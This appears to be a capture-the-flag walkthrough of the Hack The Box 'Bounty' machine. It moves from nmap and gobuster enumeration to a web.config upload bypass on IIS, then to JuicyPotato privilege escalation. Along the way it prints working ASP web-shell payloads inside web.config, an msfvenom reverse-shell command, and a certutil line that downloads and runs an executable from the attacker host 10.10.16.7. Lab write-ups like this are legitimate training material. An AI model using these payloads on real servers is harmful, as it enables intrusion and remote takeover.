Starting with a basic nmap scan using nmap automator

└─$ autonmap 10.10.10.93 All                                                                                                                                  2 ⚙

Running all scans on 10.10.10.93

Host is likely running Windows


---------------------Starting Port Scan-----------------------



PORT   STATE SERVICE
80/tcp open  http



---------------------Starting Script Scan-----------------------



PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows




---------------------Starting Full Scan------------------------



PORT   STATE SERVICE
80/tcp open  http

No new ports

Here we only have port 80 open which is running a web server

There is nothing in the source code of the webpage

Adding the entry in the etc/hosts file

Running a gobuster scan on the website

On http://10.10.10.93/aspnet_client/ we get a 403 forbidden : access denied

On http://10.10.10.93/aspnet_client/system_web/ we get the same 403 access denied

Same access denied on http://10.10.10.93/uploadedfiles/

We know that the server is running ASP.NET so we will try to run gobuster for finding aspx extension files

We get

Going to http://10.10.10.93/transfer.aspx

It looks some kind of file upload page

So now we'll create a dummy aspx file and try to upload it

We get an error while uploading the .aspx file

Creating a new file with .png extension

And we have successfully uploaded .png file

Now viewing the same upload request in the burp

Sending it to repeater and changing the extension of the file

Trying a bunch of different extensions we find that we can upload .config file

We find a blog giving detailed instructions on how to exploit this

Now creating a file web.config as stated in the article and uploading it

And the web.config file is successfully uploaded

From the gobuster scan we ran previously we know that there is a directory called uploadedfiles

According to the article if we see 3 after uploading and viewing the web.config file in the browser then the target is vulnerable and we have successfully exploited it

So by modifying the code in the web.config file and re-uploading it again we can gain a code execution

<?xml version=”1.0″ encoding=”UTF-8″?><br />
<configuration><br />
<system.webServer><br />
<handlers accessPolicy=”Read, Script, Write”><br />
<add name=”web_config” path=”*.config” verb=”*” modules=”IsapiModule” scriptProcessor=”%windir%\system32\inetsrv\asp.dll” resourceType=”Unspecified” requireAccess=”Write” preCondition=”bitness64″ /><br />
</handlers><br />
<security><br />
<requestFiltering><br />
<fileExtensions><br />
<remove fileExtension=”.config” /><br />
</fileExtensions><br />
<hiddenSegments><br />
<remove segment=”web.config” /><br />
</hiddenSegments><br />
</requestFiltering><br />
</security><br />
</system.webServer><br />
<appSettings><br />
</appSettings><br />
</configuration><br />
<!–
<% Response.write(“-“&”->”)<br />
Response.write(“</p>
<pre>”)</p>
<p>Set wShell1 = CreateObject(“WScript.Shell”)
Set cmd1 = wShell1.Exec(“whoami”)
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing</p>
<p>Response.write(output1)
Response.write(“</pre>
<p><!-“&”-“) %><br />
–><br />

Modifying the asp code in the file and uploading the file

Here's the modified code

Setting up tcpdum on our attacker machine to see if the command execution works

We get back the response

Now we can run any code of our choice over here

I don't know why but every time i try to execute web.config I get a 404 not found

So what we'll do now is we will create a payload for windows using msfvenom and host it on our python server and get it to execute

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.7 LPORT=1234 -f exe -o reverse.exe

Setting up a nc listener

Creating a new web.config file with the following code

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
</appSettings>
</configuration>
<!--
<%
Set wShell1 = CreateObject("WScript.Shell")
        Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.10.16.7/reverse.exe C:\users\public\exploit.exe && C:\users\public\exploit.exe")
Response.write(output1)
%>
-->

Reference https://steflan-security.com/hack-the-box-bounty-walkthrough/

Even this code keeps on giving errors

Using

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
</appSettings>
</configuration>
<!-- ASP code comes here
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->

After uploading the file and visiting the url http://10.10.10.93/uploadedfiles/web.config and viewing the source code

We have gained command execution on the server

Now we'll just use the payload we created earlier

Setup a python server and download and execute the payload on the server

Modifying the code ,And finally we get a shell

We are the user bounty\merlin

Here's the systeminfo

When looking for user.txt file we don't find it

The earlier shell was stuck so i decided to use Nishang's Invoke-Powershelltcp.ps1 script for getting a shell

Using the GetChildItem . -Force we get the user.txt

Now it's time for some priv-esc

There is a privilege called SeImpersonatePrivilege which we can use to gain administrator privileges

Get the Juicy-Potato.exe and create a new msfvenom payload to get the administrator reverse shell

Setting up an impacket-smbserver and transferring the JuicyPotato.exe and the new msfvenome payload to the victim machine

Running the JuicyPotato.exe

We are now NT\Authority

And finally we get the root.txt